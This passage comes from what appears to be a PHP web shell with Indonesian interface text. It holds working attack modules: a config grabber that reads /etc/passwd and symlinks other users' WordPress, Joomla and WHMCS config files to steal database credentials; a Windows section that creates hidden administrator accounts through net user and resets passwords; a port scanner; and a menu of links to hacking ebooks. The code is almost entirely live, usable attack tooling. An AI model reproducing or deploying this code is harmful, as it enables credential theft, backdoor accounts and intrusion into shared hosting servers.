  1362. </td>
  1363. </tr>
  1364. <tr>
  1365. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  1366. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
  1367. </strong>
  1368. </td>
  1369. <tr>
  1370. </form>
  1371. <tr>
  1372. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
  1373. </tr>
  1374. <form method="POST" target="_blank">
  1375. <strong>
  1376. <input name="mendapatkan" type="hidden" value="passwd">
  1377. </strong>
  1378. <tr>
  1379. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
  1380. <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
  1381. </strong>
  1382. </td>
  1383. </tr>
  1384. <tr>
  1385. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  1386. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  1387. </strong>
  1388. </td>
  1389. <tr>
  1390. </form>
  1391. <tr>
  1392. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
  1393. </tr>
  1394. <form method="POST" target="_blank">
  1395. <strong>
  1396. <input name="pass" type="hidden" value="password">
  1397. </strong>
  1398. <tr>
  1399. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
  1400. <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
  1401. </strong>
  1402. </td>
  1403. </tr>
  1404. <tr>
  1405. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  1406. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  1407. </strong>
  1408. </td>
  1409. <tr>
  1410. </form>
  1411. <tr>
  1412. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
  1413. Security</strong></td>
  1414. </tr>
  1415. <tr>
  1416. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  1417. <td valign="top" bgcolor="#151515" colspan="5">
  1418. <strong>
  1419. <?php
  1420. $safe_mode = ini_get('safe_mode');
  1421. if($safe_mode=='1')
  1422. {
  1423. echo 'ON';
  1424. }else{
  1425. echo 'OFF';
  1426. }
  1427.  
  1428. ?>
  1429. </strong>
  1430. </td>
  1431. </tr>
  1432. <tr>
  1433. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
  1434. <td valign="top" bgcolor="#151515" colspan="5">
  1435. <strong>
  1436. <form method="POST" target="_blank">
  1437. <strong>
  1438. <input name="matikan" type="hidden" value="sekatan">
  1439. </strong>
  1440.  
  1441. <?php
  1442. if(''==($func=@ini_get('disable_functions')))
  1443. {
  1444. echo "<font color=#FFFFFF>No Security for Function</font></b>";
  1445. }else{
  1446. echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
  1447. echo "<font color=red>$func</font></b>";
  1448. echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
  1449. echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
  1450. </strong>
  1451. </td></tr>';
  1452. }
  1453. ?>
  1454. </strong></td></tr></table></table></table>
  1455.  
  1456. <?php
  1457. }
  1458. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabber')){ @ini_set('output_buffering',0);
  1459. ?>
  1460. <form action="?y=<?php echo $pwd; ?>&x=grabber" method="post">
  1461. <center><b>
  1462. <b><br/><span class="b7">O=:[ Config</span> <span class="b8">Grabber ]:=O</span></b></center>
  1463. <?php
  1464. echo "
  1465. <form method='POST'>
  1466. </head>
  1467. <style>
  1468. textarea {
  1469. resize:none;
  1470. color: #000000 ;
  1471. background-color:#000000;
  1472. font-size:8pt; color:#ffffff;
  1473. border:1px solid white ;
  1474. border-left:;
  1475. width:543px;
  1476. height:400px;
  1477. }
  1478. input {
  1479. color: #000000;
  1480. border:1px dotted white;
  1481. }
  1482. </style>";
  1483. echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#007700" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='inputzbut' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('rabbit_grab', 0755);@chdir('rabbit_grab');
  1484. $htaccess="
  1485. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  1486. Options Indexes FollowSymLinks
  1487. ForceType text/plain
  1488. AddType text/plain .php
  1489. AddType text/plain .html
  1490. AddType text/html .shtml
  1491. AddType txt .php
  1492. AddHandler server-parsed .php
  1493. AddHandler txt .php
  1494. AddHandler txt .html
  1495. AddHandler txt .shtml
  1496. Options All
  1497. Options All";
  1498. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
  1499. $passwd=explode("\n",$passwd);
  1500. echo "<br><br><center><font color=#b0b000 size=2pt>wait ...</center><br>";
  1501. foreach($passwd as $pwd){
  1502. $pawd=explode(":",$pwd);$user =$pawd[0];
  1503. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
  1504. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
  1505. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
  1506. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
  1507. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
  1508. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
  1509. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
  1510. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
  1511. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
  1512. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
  1513. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
  1514. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
  1515. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
  1516. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
  1517. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
  1518. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
  1519. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
  1520. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
  1521. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
  1522. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
  1523. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
  1524. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
  1525. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
  1526. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
  1527. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
  1528. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
  1529. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
  1530. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
  1531. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
  1532. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
  1533. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
  1534. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
  1535. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
  1536. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
  1537. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
  1538. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
  1539. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
  1540. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
  1541. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
  1542. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');
  1543. @symlink('/home/'.$user.'/public_html/lib/config.php',$user.'-balit-config.txt');}
  1544. echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="rabbit_grab">Open configs</a></font></b>';}
  1545. ?>
  1546.  
  1547. <?php }
  1548. //////////////////////////////////////////
  1549.  
  1550. elseif(isset($_GET['x']) && ($_GET['x'] == 'tutor'))
  1551. {
  1552. ?>
  1553. <form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">
  1554. <center><br><br><b>+--=[ Tutorial & Ebook hacking ]=--+</b><br>
  1555. <form method="post" action="">
  1556. <table class="tabnet" border="1" >
  1557. <tr>
  1558. <td align="center">English</td><td align="center">Indonesian</td>
  1559. </tr>
  1560. <tr>
  1561. <td><form method="post" action="">&nbsp;
  1562. E-book Hacking &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  1563. <select class="inputzbut" name="pilih" id="pilih">
  1564. <option value=""selected>-----------------[ Select ]-----------------</option>
  1565. <option value="tutorial24" > Hacking Exposed-5 </option>
  1566. <option value="tutorial25"> Internet Denial Of Service </option>
  1567. <option value="tutorial26">Computer Viruses For Dummies</option>
  1568. <option value="tutorial27">Hack Attacks Testing</option>
  1569. <option value="tutorial28">Secrets Of A Super Hacker</option>
  1570. <option value="tutorial29">Stealing The Network</option>
  1571. <option value="tutorial30">Hacker's HandBook</option>
  1572. </select>
  1573. <input type="submit" name="submit" class="inputzbut" value="Download">
  1574. </td></form>
  1575. <td><form method="post" action="">&nbsp;
  1576. Tutorial by X'1N73CT &nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  1577. <select class="inputzbut" name="pilih" id="pilih">
  1578. <option value=""selected>-----------------[ Select ]-----------------</option>
  1579. <option value="tutorial2">Search Engine Hacking</option>
  1580. <option value="tutorial3">SQL Injection dengan hackbar</option>
  1581. <option value="tutorial1" >Bypass Union</option>
  1582. </select>
  1583. <input type="submit" name="submit" class="inputzbut" value="Download">
  1584. </form></td>
  1585. </tr>
  1586. <tr>
  1587. <td>
  1588. <form method="post" action="">&nbsp;
  1589. E-Book from Syn|gress &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  1590. <select class="inputzbut" name="pilih" id="pilih">
  1591. <option value=""selected>-----------------[ Select ]-----------------</option>
  1592. <option value="cryptography_for_defeloper">Cryptography for Developer</option>
  1593. <option value="tutorial31">Mobile Malware Attack and Defense</option>
  1594. <option value="forensic">CD and DVD Forensic</option>
  1595. <option value="ddd">Open Sourch Security Tools</option>
  1596. <option value="metasploit">Metaslpoit Toolkit</option>
  1597. <option value="stealing_network">Stealing the Network</option>
  1598. <option value="security_polices">Creating Security Polices</option>
  1599. </select>
  1600. <input type="submit" name="submit" class="inputzbut" value="Download">
  1601. </form></td>
  1602. <td>
  1603. <form method="post" action="">&nbsp;
  1604. X-CODE MAGAZINE &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  1605. <select class="inputzbut" name="pilih" id="pilih">
  1606. <option value=""selected>-----------------[ Select ]-----------------</option>
  1607. <option value="tutorial4">X-CODE MAGAZINE 1</option>
  1608. <option value="tutorial5">X-CODE MAGAZINE 2</option>
  1609. <option value="tutorial6">X-CODE MAGAZINE 3</option>
  1610. <option value="tutorial7">X-CODE MAGAZINE 4</option>
  1611. <option value="tutorial8">X-CODE MAGAZINE 5</option>
  1612. <option value="tutorial9">X-CODE MAGAZINE 6</option>
  1613. <option value="tutorial10">X-CODE MAGAZINE 7</option>
  1614. <option value="tutorial11">X-CODE MAGAZINE 8</option>
  1615. <option value="tutorial12">X-CODE MAGAZINE 9</option>
  1616. <option value="tutorial13">X-CODE MAGAZINE 10</option>
  1617. <option value="tutorial14">X-CODE MAGAZINE 11</option>
  1618. <option value="tutorial15">X-CODE MAGAZINE 12</option>
  1619. <option value="tutorial16">X-CODE MAGAZINE 13</option>
  1620. <option value="tutorial17">X-CODE MAGAZINE 14</option>
  1621. <option value="tutorial18">X-CODE MAGAZINE 15</option>
  1622. <option value="tutorial19">X-CODE MAGAZINE 16</option>
  1623. <option value="tutorial20">X-CODE MAGAZINE 17</option>
  1624. <option value="tutorial21">X-CODE MAGAZINE 18</option>
  1625. <option value="tutorial22">X-CODE MAGAZINE 19</option>
  1626. <option value="tutorial23">X-CODE MAGAZINE 20</option>
  1627. <option value="tutorial024">X-CODE MAGAZINE 21</option>
  1628. </select>
  1629. <input type="submit" name="submit" class="inputzbut" value="Download" ></a>
  1630. </form></td></tr></table><br><br>
  1631. <?php
  1632. $submit = $_POST ['submit'];
  1633. if(isset($submit)) {
  1634. $pilih = $_POST['pilih'];
  1635. if ( $pilih == 'tutorial1') {
  1636. ?>
  1637. <script>
  1638. document.location = 'http://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf';
  1639. </script>
  1640. <?php
  1641. }
  1642. elseif ( $pilih == 'tutorial2') {
  1643. ?>
  1644. <script>
  1645. document.location = 'http://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf';
  1646. </script>
  1647. <?php
  1648. }
  1649. elseif ( $pilih == 'tutorial3') {
  1650. ?>
  1651. <script>
  1652. document.location = 'http://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf';
  1653. </script>
  1654. <?php
  1655. }
  1656. elseif ( $pilih == 'tutorial4') {
  1657. ?>
  1658. <script>
  1659. document.location = 'http://xcode.or.id/files/xcode_magazine_1.zip';
  1660. </script>
  1661. <?php
  1662. }
  1663. elseif ( $pilih == 'tutorial5') {
  1664. ?>
  1665. <script>
  1666. document.location = 'http://xcode.or.id/files/xcode_magazine_2.zip';
  1667. </script>
  1668. <?php
  1669. }
  1670. elseif ( $pilih == 'tutorial6') {
  1671. ?>
  1672. <script>
  1673. document.location = 'http://xcode.or.id/files/xcode_magazine_3.zip';
  1674. </script>
  1675. <?php
  1676. }
  1677. elseif ( $pilih == 'tutorial7') {
  1678. ?>
  1679. <script>
  1680. document.location = 'http://xcode.or.id/files/xcode_magazine_4.zip';
  1681. </script>
  1682. <?php
  1683. }
  1684. elseif ( $pilih == 'tutorial8') {
  1685. ?>
  1686. <script>
  1687. document.location = 'http://xcode.or.id/files/xcode_magazine_5.rar';
  1688. </script>
  1689. <?php
  1690. }
  1691. elseif ( $pilih == 'tutorial9') {
  1692. ?>
  1693. <script>
  1694. document.location = 'http://xcode.or.id/files/xcode_magazine_6.rar';
  1695. </script>
  1696. <?php
  1697. }
  1698. elseif ( $pilih == 'tutorial10') {
  1699. ?>
  1700. <script>
  1701. document.location = 'http://xcode.or.id/files/xcode_magazine_7.rar';
  1702. </script>
  1703. <?php
  1704. }
  1705. elseif ( $pilih == 'tutorial11') {
  1706. ?>
  1707. <script>
  1708. document.location = 'http://xcode.or.id/files/xcode_magazine_8.rar';
  1709. </script>
  1710. <?php
  1711. }
  1712. elseif ( $pilih == 'tutorial12') {
  1713. ?>
  1714. <script>
  1715. document.location = 'http://xcode.or.id/files/xcode9.zip';
  1716. </script>
  1717. <?php
  1718. }
  1719. elseif ( $pilih == 'tutorial13') {
  1720. ?>
  1721. <script>
  1722. document.location = 'http://xcode.or.id/files/xcode10.zip';
  1723. </script>
  1724. <?php
  1725. }
  1726. elseif ( $pilih == 'tutorial14') {
  1727. ?>
  1728. <script>
  1729. document.location = 'http://xcode.or.id/files/xcode11.zip';
  1730. </script>
  1731. <?php
  1732. }
  1733. elseif ( $pilih == 'tutorial15') {
  1734. ?>
  1735. <script>
  1736. document.location = 'http://xcode.or.id/files/Xcode12.zip';
  1737. </script>
  1738. <?php
  1739. }
  1740. elseif ( $pilih == 'tutorial16') {
  1741. ?>
  1742. <script>
  1743. document.location = 'http://xcode.or.id/files/Xcode13.zip';
  1744. </script>
  1745. <?php
  1746. }
  1747. elseif ( $pilih == 'tutorial17') {
  1748. ?>
  1749. <script>
  1750. document.location = 'http://xcode.or.id/files/Xcode14.zip';
  1751. </script>
  1752. <?php
  1753. }
  1754. elseif ( $pilih == 'tutorial18') {
  1755. ?>
  1756. <script>
  1757. document.location = 'http://xcode.or.id/Xcode15.zip';
  1758. </script>
  1759. <?php
  1760. }
  1761. elseif ( $pilih == 'tutorial19') {
  1762. ?>
  1763. <script>
  1764. document.location = 'http://xcode.or.id/xcode_magazine_16.zip';
  1765. </script>
  1766. <?php
  1767. }
  1768. elseif ( $pilih == 'tutorial20') {
  1769. ?>
  1770. <script>
  1771. document.location = 'http://xcode.or.id/xcode_magazine_17.zip';
  1772. </script>
  1773. <?php
  1774. }
  1775. elseif ( $pilih == 'tutorial21') {
  1776. ?>
  1777. <script>
  1778. document.location = 'http://xcode.or.id/xcode_magazine_18.zip';
  1779. </script>
  1780. <?php
  1781. }
  1782. elseif ( $pilih == 'tutorial22') {
  1783. ?>
  1784. <script>
  1785. document.location = 'http://xcode.or.id/xcode_magazine_19.zip';
  1786. </script>
  1787. <?php
  1788. }
  1789. elseif ( $pilih == 'tutorial23') {
  1790. ?>
  1791. <script>
  1792. document.location = 'http://xcode.or.id/xcode_magazine_20.zip';
  1793. </script>
  1794. <?php
  1795. }
  1796. elseif ( $pilih == 'tutorial024') {
  1797. ?>
  1798. <script>
  1799. document.location = 'http://xcode.or.id/xcode_magazine_21.zip';
  1800. </script>
  1801. <?php
  1802. }
  1803.  
  1804. elseif ( $pilih == 'tutorial24') {
  1805. ?>
  1806. <script>
  1807. document.location = 'http://www.insecure.in/ebooks/hacking_exposed_5.rar';
  1808. </script>
  1809. <?php
  1810. }
  1811. elseif ( $pilih == 'tutorial25') {
  1812. ?>
  1813. <script>
  1814. document.location = 'http://www.insecure.in/ebooks/internet_denial_of_service.rar';
  1815. </script>
  1816. <?php
  1817. }
  1818. elseif ( $pilih == 'tutorial26') {
  1819. ?>
  1820. <script>
  1821. document.location = 'http://www.insecure.in/ebooks/computer_viruses_for_dummies.rar';
  1822. </script>
  1823. <?php
  1824. }
  1825. elseif ( $pilih == 'tutorial27') {
  1826. ?>
  1827. <script>
  1828. document.location = 'http://www.insecure.in/ebooks/hack_attacks_testing.rar';
  1829. </script>
  1830. <?php
  1831. }
  1832. elseif ( $pilih == 'tutorial28') {
  1833. ?>
  1834. <script>
  1835. document.location = 'http://www.insecure.in/ebooks/secrets_of_super_hacker.rar';
  1836. </script>
  1837. <?php
  1838. }
  1839. elseif ( $pilih == 'tutorial29') {
  1840. ?>
  1841. <script>
  1842. document.location = 'http://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar';
  1843. </script>
  1844. <?php
  1845. }
  1846. elseif ( $pilih == 'tutorial30') {
  1847. ?>
  1848. <script>
  1849. document.location = 'http://www.insecure.in/ebooks/webapp_hackers_handbook.rar';
  1850. </script>
  1851. <?php
  1852. }
  1853. elseif ( $pilih == 'ddd') {
  1854. ?>
  1855. <script>
  1856. document.location = 'http://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf';
  1857. </script>
  1858. <?php
  1859. }
  1860. elseif ( $pilih == 'tutorial31') {
  1861. ?>
  1862. <script>
  1863. document.location = 'http://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf';
  1864. </script>
  1865. <?php
  1866. }
  1867. elseif ( $pilih == 'cryptography_for_defeloper') {
  1868. ?>
  1869. <script>
  1870. document.location = 'http://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf';
  1871. </script>
  1872. <?php
  1873. }
  1874. elseif ( $pilih == 'forensic') {
  1875. ?>
  1876. <script>
  1877. document.location = 'http://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf';
  1878. </script>
  1879. <?php
  1880. }
  1881. elseif ( $pilih == 'metasploit') {
  1882. ?>
  1883. <script>
  1884. document.location = 'http://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf';
  1885. </script>
  1886. <?php
  1887. }elseif ( $pilih == 'stealing_network') {
  1888. ?>
  1889. <script>
  1890. document.location = 'http://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf';
  1891. </script>
  1892. <?php
  1893. }elseif ( $pilih == 'security_polices') {
  1894. ?>
  1895. <script>
  1896. document.location = 'http://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf';
  1897. </script>
  1898. <?php
  1899. }
  1900. }
  1901.  
  1902. }
  1903.  
  1904. /////////////////////////////////////////////////////////////////
  1905. elseif(isset($_GET['x']) && ($_GET['x'] == 'port-sc'))
  1906. {
  1907. ?>
  1908. <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">
  1909. <?php
  1910. echo '<br><br><center><br><b>+--=[ Port Scanner ]=--+</b><br>';
  1911. $start = strip_tags($_POST['start']);
  1912. $end = strip_tags($_POST['end']);
  1913. $host = strip_tags($_POST['host']);
  1914. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  1915. for($i = $start; $i<=$end; $i++){
  1916. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1917. if($fp){
  1918. echo 'Port '.$i.' is <font color=green>open</font><br>';
  1919. }
  1920. flush();
  1921. }
  1922. }else{
  1923. echo '<table class=tabnet style="width:300px;padding:0 1px;">
  1924. <input type="hidden" name="y" value="phptools">
  1925. <tr><th colspan="5">Port Scanner</th></center></tr>
  1926. <tr>
  1927. <td>Host</td>
  1928. <td><input type="text" class="inputz" style="width:220px;color:#FFFFFF;" name="host" value="localhost"/></td>
  1929. </tr>
  1930. <tr>
  1931. <td>Port start</td>
  1932. <td><input type="text" class="inputz" style="width:220px;color:#FFFFFF;" name="start" value="0"/></td>
  1933. </tr>
  1934. <tr><td>Port end</td>
  1935. <td><input type="text" class="inputz" style="width:220px;color:#FFFFFF;" name="end" value="5000"/></td>
  1936. </tr><td><input class="inputzbut" type="submit" style="color:#FFFFFF" value="Scan Ports" />
  1937. </td></form></center></table>';
  1938. }
  1939. }
  1940. /////////////////
  1941. elseif(isset($_GET['x']) && ($_GET['x'] == 'port-sc'))
  1942. {
  1943. ?>
  1944. <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">
  1945. <?php if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'){?>
  1946.  
  1947.  
  1948. <div id="content-center">
  1949. _______________________________________________________________________________
  1950. <p>-| Create RDP |-</p>
  1951. <form action="" method="post">Username : <input type="text" name="username" required> Password : <input type="text" name="password" required> <input type="hidden" name="kshell" value="1"><input type="submit" name="submit" value=">>">
  1952. </form>
  1953. </div>
  1954.  
  1955.  
  1956. <div id="content-center">
  1957. <p>-| Option |-</p>
  1958. <form action="" method="post">!command : <input type="text" name="rusername" placeholder="Masukan Username"> <select name="aksi">
  1959. <option value="1">Tampilkan Username</option>
  1960. <option value="2">Hapus Username</option>
  1961. <option value="3">Ubah Password</option>
  1962. </select>
  1963. <input type="hidden" name="kshell" value="2">
  1964. <input type="submit" name="submit" value=">>"></form>
  1965. _______________________________________________________________________________
  1966. </div>
  1967. <?php }else{
  1968. echo "<br><center/><b>Status: $status_work<b/>";
  1969. }
  1970. ?>
  1971.  
  1972.  
  1973.  
  1974. <?php
  1975. if($_POST['submit']){
  1976. echo "<div id='content-center'><p>____________________________________{ INFO }___________________________________</p>";
  1977. if($_POST['kshell']=="1"){
  1978. $r_user = $_POST['username'];
  1979. $r_pass = $_POST['password'];
  1980. $cmd_cek_user = shell_exec("net user");
  1981. if(preg_match("/$r_user/", $cmd_cek_user)){
  1982. echo $gaya_root.$r_user." sudah ada".$o;
  1983. }else {
  1984. $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
  1985. $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
  1986. $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
  1987. $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
  1988.  
  1989. if($cmd_add_user){
  1990. echo $gaya_root."[add user]-> ".$r_user." <span style='color:#00FF00'/>Berhasil</font>".$o;
  1991. }else {
  1992. echo $gaya_root."[add user]-> ".$r_user." <span style='color:red'/>Gagal</font>".$o;
  1993. }
  1994. if($cmd_add_groups1){
  1995. echo $gaya_root."[add localgroup Administrators]-> ".$r_user." <span style='color:#00FF00'/>Berhasil</font>".$o;
  1996. }else
  1997. if($cmd_add_groups2){
  1998. echo $gaya_root."[add localgroup Administrator]-> ".$r_user." <span style='color:#00FF00'/>Berhasil</font>".$o;
  1999. }else
  2000. if($cmd_add_groups3){
  2001. echo $gaya_root."[add localgroup Administrateur]-> ".$r_user." <span style='color:#00FF00'/>Berhasil</font>".$o;
  2002. }else {
  2003. echo $gaya_root."[add localgroup]-> ".$r_user." <span style='color:red'/>Gagal - Contact Shor7sec</font>".$o;
  2004. }
  2005. echo $gaya_root."[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password : ".$r_pass." <span style='color:#00FF00'/>Berhasil</font>".$o;
  2006.  
  2007. }
  2008.  
  2009.  
  2010.  
  2011. }else if($_POST['kshell']=="2"){
  2012.  
  2013. if($_POST['aksi']=="1"){
  2014. echo "<pre>".shell_exec("net user");
  2015. }
  2016. else if($_POST['aksi']=="2"){
  2017. $username = $_POST['rusername'];
  2018. $cmd_cek_user = shell_exec("net user");
  2019. if (!empty($username)){
  2020. if(preg_match("/$username/", $cmd_cek_user)){
  2021. $cmd_add_user = shell_exec("net user ".$username." /DELETE");
  2022. if($cmd_add_user){
  2023. echo $gaya_root."[remove user]-> ".$username." <span style='color:#00FF00'/>Berhasil</font>".$o;
  2024. }else {
  2025. echo $gaya_root."[remove user]-> ".$username." <span style='color:red'/>gagal</font>".$o;
  2026. }
  2027. }else {
  2028. echo $gaya_root."[remove user]-> ".$username." <span style='color:red'/>Tidak ditemukan</font>".$o;
  2029. }
  2030. }else {
  2031. echo $gaya_root."[PESAN]-> <span style='color:red'/>Kamu lupa masukin Username yang akan di delete</font>".$o;
  2032. }
  2033. }
  2034. else if($_POST['aksi']=="3"){
  2035. $username = $_POST['rusername'];
  2036. $password = "shor7cut";
  2037. $cmd_cek_user = shell_exec("net user");
  2038. if (!empty($username)){
  2039. if(preg_match("/$username/", $cmd_cek_user)){
  2040. $cmd_add_user = shell_exec("net user ".$username." shor7cut");
  2041. if($cmd_add_user){
  2042. echo $gaya_root."[change password]-> (".$username."|".$password.") <span style='color:#00FF00'/>Berhasil</font>".$o;
  2043. }else {
  2044. echo $gaya_root."[change password]-> (".$username."|".$password.") <span style='color:red'/>GAGAL</font>".$o;
  2045. }
  2046. }else
  2047. {
  2048. echo $gaya_root."[PESAN]-> <span style='color:red'/>Username Tidak Ditemukan di server</font>".$o;
  2049. }
  2050. }else
  2051. {
  2052. echo $gaya_root."[PESAN]-> <span style='color:red'/>Kamu lupa masukin Username yang akan di delete</font>".$o;
  2053. }
  2054.  
  2055. }
  2056. }
  2057. }
  2058. }
  2059. /////////////////////////////////////////////////////////////////
  2060.  
  2061. elseif(isset($_GET['x']) && ($_GET['x'] == 'hash'))
  2062. {
  2063. $submit= $_POST['enter'];
  2064. if (isset($submit)) {
  2065. $pass = $_POST['password']; // password
  2066. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  2067. $hash = md5($pass); // md5 hash #1
  2068. $md4 = hash("md4",$pass);
  2069. $hash_md5 = md5($salt.$pass); // md5 hash with salt #2
  2070. $hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
  2071. $hash1 = sha1($pass); // sha1 hash #4
  2072. $sha256 = hash("sha256",$text);
  2073. $hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
  2074. $hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
  2075. }
  2076. echo '<form action="" method="post"><b><table class=tabnet>';
  2077. echo '<tr><th colspan="2">Password Hash</th></center></tr>';
  2078. echo '<tr><td><b>masukan kata yang ingin di encrypt:</b></td>';
  2079. echo '<td><input class="inputz" type="text" name="password" size="40" />';
  2080. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
